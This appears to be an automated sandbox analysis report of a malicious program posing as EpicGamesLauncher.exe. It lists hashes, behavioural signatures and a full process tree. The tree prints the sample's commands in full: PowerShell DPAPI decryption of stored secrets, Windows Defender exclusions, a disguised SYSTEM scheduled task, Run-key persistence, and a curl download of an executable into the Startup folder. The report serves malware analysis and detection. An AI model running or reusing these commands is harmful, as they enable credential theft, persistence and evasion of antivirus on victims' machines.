Analysis

  • max time kernel
    83s
  • max time network
    94s
  • platform
    windows11-21h2_x64
  • resource
    win11-20231215-en
  • resource tags
    arch:x64
    arch:x86
    image:win11-20231215-en
    locale:en-us
    os:windows11-21h2-x64
    system
  • submitted
    28-01-2024 18:28

General

  • Target

    EpicGamesLauncher.exe

  • Size

    154.9MB

  • MD5

    928282456673e0a194360f9d411f165d

  • SHA1

    9820bd055f95d157fdbdc973bfc955c282a18c29

  • SHA256

    5088d3e4c0b15af2cdd00ab98ca1cdd273cce489b7ac610d4ddda1f1f8154b82

  • SHA512

    c71623dd5396c89bf3d163451cb0c47d26181d4e4136c041cc888c78ef770d944a64c505efdbbe94bd09456c5b072845f98d3e5b3bcf68075cacb6bd1dfc1753

  • SSDEEP

    1572864:HCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:nDAgZi

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
    "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:3108
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2496
      • C:\Windows\system32\reg.exe
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f
        3⤵
        PID:228
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3820
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:240
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,117,187,176,194,125,35,114,77,144,124,4,194,96,231,57,20,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,88,188,177,69,159,244,78,49,36,37,13,16,61,123,22,52,165,96,31,7,181,89,43,97,239,36,133,195,145,206,249,188,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,14,130,143,153,232,28,222,36,176,93,152,240,69,4,63,103,84,145,4,102,184,141,229,30,45,70,3,80,13,126,80,12,48,0,0,0,70,137,73,114,174,219,82,237,21,36,128,227,226,7,134,121,119,196,34,201,27,42,93,236,183,227,66,86,75,3,104,162,39,131,33,156,77,217,56,74,123,142,84,10,75,134,81,67,64,0,0,0,156,56,137,211,20,196,4,162,160,166,211,177,139,126,179,0,170,247,246,148,134,51,204,252,148,198,27,173,71,151,67,110,166,204,25,196,120,245,124,176,239,114,79,250,87,107,188,230,15,207,32,113,43,208,131,176,125,148,212,15,30,43,50,197), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:544
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,117,187,176,194,125,35,114,77,144,124,4,194,96,231,57,20,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,88,188,177,69,159,244,78,49,36,37,13,16,61,123,22,52,165,96,31,7,181,89,43,97,239,36,133,195,145,206,249,188,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,14,130,143,153,232,28,222,36,176,93,152,240,69,4,63,103,84,145,4,102,184,141,229,30,45,70,3,80,13,126,80,12,48,0,0,0,70,137,73,114,174,219,82,237,21,36,128,227,226,7,134,121,119,196,34,201,27,42,93,236,183,227,66,86,75,3,104,162,39,131,33,156,77,217,56,74,123,142,84,10,75,134,81,67,64,0,0,0,156,56,137,211,20,196,4,162,160,166,211,177,139,126,179,0,170,247,246,148,134,51,204,252,148,198,27,173,71,151,67,110,166,204,25,196,120,245,124,176,239,114,79,250,87,107,188,230,15,207,32,113,43,208,131,176,125,148,212,15,30,43,50,197), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3804
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,117,187,176,194,125,35,114,77,144,124,4,194,96,231,57,20,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,164,119,163,34,135,74,178,240,63,43,79,97,213,13,102,156,78,224,181,168,240,220,225,231,81,235,70,207,14,15,104,201,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,68,41,98,143,158,44,10,97,42,30,44,16,217,134,38,236,84,10,79,183,7,190,236,177,37,253,51,251,102,40,175,217,48,0,0,0,16,165,141,168,118,147,167,55,129,96,100,114,246,179,204,6,177,210,76,67,170,222,51,164,234,178,213,45,139,67,203,82,53,29,38,117,206,164,134,113,161,147,166,226,108,213,16,158,64,0,0,0,43,48,98,185,134,17,42,150,116,221,19,191,151,165,100,202,106,216,108,5,233,16,200,251,247,160,197,227,156,199,158,239,217,231,101,26,185,39,233,93,105,249,132,105,61,145,35,16,247,20,165,108,197,18,83,76,232,242,237,53,164,12,73,85), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2184
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,117,187,176,194,125,35,114,77,144,124,4,194,96,231,57,20,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,164,119,163,34,135,74,178,240,63,43,79,97,213,13,102,156,78,224,181,168,240,220,225,231,81,235,70,207,14,15,104,201,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,68,41,98,143,158,44,10,97,42,30,44,16,217,134,38,236,84,10,79,183,7,190,236,177,37,253,51,251,102,40,175,217,48,0,0,0,16,165,141,168,118,147,167,55,129,96,100,114,246,179,204,6,177,210,76,67,170,222,51,164,234,178,213,45,139,67,203,82,53,29,38,117,206,164,134,113,161,147,166,226,108,213,16,158,64,0,0,0,43,48,98,185,134,17,42,150,116,221,19,191,151,165,100,202,106,216,108,5,233,16,200,251,247,160,197,227,156,199,158,239,217,231,101,26,185,39,233,93,105,249,132,105,61,145,35,16,247,20,165,108,197,18,83,76,232,242,237,53,164,12,73,85), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2188
    • C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
      "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\EpicGamesLauncher" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1704 --field-trial-handle=1896,i,10055106198983210111,3317251793597964183,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
      2⤵
      PID:4812
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1216
    • C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe
      "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\EpicGamesLauncher" --mojo-platform-channel-handle=1208 --field-trial-handle=1896,i,10055106198983210111,3317251793597964183,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
      2⤵
      PID:4412
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cscript //B //nologo "C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4544
  • C:\Windows\system32\schtasks.exe
    schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
    1⤵
    • Creates scheduled task(s)
    PID:4712
  • C:\Windows\system32\cscript.exe
    cscript //B //nologo "C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\CheckEpicGamesLauncher.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2944
      • C:\Windows\system32\reg.exe
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EpicGamesLauncher"
        3⤵
        • Modifies registry key
        PID:4296
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exemple.exe""
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4432
      • C:\Windows\system32\curl.exe
        curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exemple.exe" YOUR-DIRECT-DOWNLOAD-HERE
        3⤵
        PID:4196
  • C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EpicGamesLauncher" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" /f
    1⤵
    • Adds Run key to start application
    • Modifies registry key
    PID:2788

Network

MITRE ATT&CK Enterprise v15

Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            3KB

            MD5

            f69f145ee494b2d67c5d50108c862d4a

            SHA1

            68f36b9bd553beb2a7eec5f4a8fef317703c77e1

            SHA256

            06dd71fdfda7e319131bf98bd21dc6bee9a480736ab688e52bafe10074f00fc7

            SHA512

            302489f1e2676d83cf9cf92d378176a230f15975af12e2a2a50d9c057f4de0fc2c22f68a9390f5b337eaa10ea77366a1a79e71808de1e7a7c4e6432aeb75c530

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            e7339e4d017234926c6384e8ef20b163

            SHA1

            0c3c4db486c5b8dc0eea6a93d0839af22b1aef85

            SHA256

            eed9464de2ab5c9f58f0e4788f26f77c690ce39984bc95627ac55ba530f71a3b

            SHA512

            a2c5fc13d6fe7d602ae461f732495db08b802d35ce54c9a5233f2600efc5ac5f6276fedf8bcc02dad3a266354965836186950def9a7716d71729bb9fdcfdda6e

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            893b9532155131e022a692e47a25aa6f

            SHA1

            3a4b59a134ad232cde089477dcda0761c602f4be

            SHA256

            28a66af519cd7ef3c5a2c3acf62cd87c2d01e8de0e30ca57a43e121bdab58c3e

            SHA512

            fd28859ef52459c4a72d557da9005de37140cf47f8b0c02949e33d9f3d2c2bd00ee529310df398bb75e18f1f07fed69d9af6f97493d5c1b58961fb1ac82967f6

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            1e55f772985b854903378076f66a210c

            SHA1

            b330fe58e792634956caa9c22fbbf274cab126fc

            SHA256

            1dc72835cfe740b65cf96c0a6d5c9f46198a69f19462d1c122d137337ffa3ee5

            SHA512

            9c9f9407bc12ff9236df56eeeb6dc691e9aec42bc4d398ff86c68c7025434b0975d22276b06c3be270f2049877114e2b322b8daddefed53de94ec75be0c2f3e3

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ulvghexd.4gn.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\c5d4200e-7b09-4d58-b8b1-8c7465524f44.tmp.node

            Filesize

            1.8MB

            MD5

            3072b68e3c226aff39e6782d025f25a8

            SHA1

            cf559196d74fa490ac8ce192db222c9f5c5a006a

            SHA256

            7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01

            SHA512

            61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

          • C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\CheckEpicGamesLauncher.bat

            Filesize

            1KB

            MD5

            c18c10cb23ca6e5490be6eb2fb1a1ddc

            SHA1

            4a3082ddd4851da7db0b8527c31b2ba23877c011

            SHA256

            a58332b95f300a9b5d1309bfc18e5b97b59c1b94145064aeedaf6e9718022b9d

            SHA512

            537462aebe04acd652f310c684b2b562d72665f2b379b830ff15f069603f3ff0229ea65504f0e53f3cb983eeae1de01c4c0518281fe31cef5a890eecc4e2b1bb

          • C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs

            Filesize

            167B

            MD5

            323e6511a0f7e82c511ea954d1530b13

            SHA1

            8b167e573b0663d1bc5a60f0d7b3f267f0bc1a20

            SHA256

            48a92c93fb07c8f059e0622ce2a95e32726d02fcb23f7bfb384374e636518597

            SHA512

            757163f84f9352bef973c6a7a994dc4a8492d224820ca5c86e572ed67b3bbe6049444d2a07b08c9efd4bb59b9e5e52ba3fdd397f01f55ddfcf3a5ae3d07ebf6a

          • memory/2188-40-0x00007FFF289B0000-0x00007FFF29472000-memory.dmp

            Filesize

            10.8MB

          • memory/2188-36-0x000001A499B50000-0x000001A499B60000-memory.dmp

            Filesize

            64KB

          • memory/2188-34-0x00007FFF289B0000-0x00007FFF29472000-memory.dmp

            Filesize

            10.8MB

          • memory/2188-35-0x000001A499B50000-0x000001A499B60000-memory.dmp

            Filesize

            64KB

          • memory/2188-37-0x000001A499B50000-0x000001A499B60000-memory.dmp

            Filesize

            64KB

          • memory/2944-66-0x0000020F7D850000-0x0000020F7D860000-memory.dmp

            Filesize

            64KB

          • memory/2944-65-0x00007FFF27890000-0x00007FFF28352000-memory.dmp

            Filesize

            10.8MB

          • memory/2944-70-0x00007FFF27890000-0x00007FFF28352000-memory.dmp

            Filesize

            10.8MB

          • memory/2944-67-0x0000020F7D850000-0x0000020F7D860000-memory.dmp

            Filesize

            64KB

          • memory/2944-68-0x0000020F7D850000-0x0000020F7D860000-memory.dmp

            Filesize

            64KB

          • memory/3804-16-0x0000021ACD2F0000-0x0000021ACD300000-memory.dmp

            Filesize

            64KB

          • memory/3804-22-0x00007FFF289B0000-0x00007FFF29472000-memory.dmp

            Filesize

            10.8MB

          • memory/3804-17-0x0000021ACD2F0000-0x0000021ACD300000-memory.dmp

            Filesize

            64KB

          • memory/3804-15-0x00007FFF289B0000-0x00007FFF29472000-memory.dmp

            Filesize

            10.8MB

          • memory/3804-18-0x0000021ACD730000-0x0000021ACD780000-memory.dmp

            Filesize

            320KB

          • memory/3804-11-0x0000021ACD300000-0x0000021ACD322000-memory.dmp

            Filesize

            136KB

          • memory/4432-81-0x0000022C24700000-0x0000022C24710000-memory.dmp

            Filesize

            64KB

          • memory/4432-80-0x00007FFF27890000-0x00007FFF28352000-memory.dmp

            Filesize

            10.8MB

          • memory/4432-82-0x0000022C24700000-0x0000022C24710000-memory.dmp

            Filesize

            64KB

          • memory/4432-84-0x00007FFF27890000-0x00007FFF28352000-memory.dmp

            Filesize

            10.8MB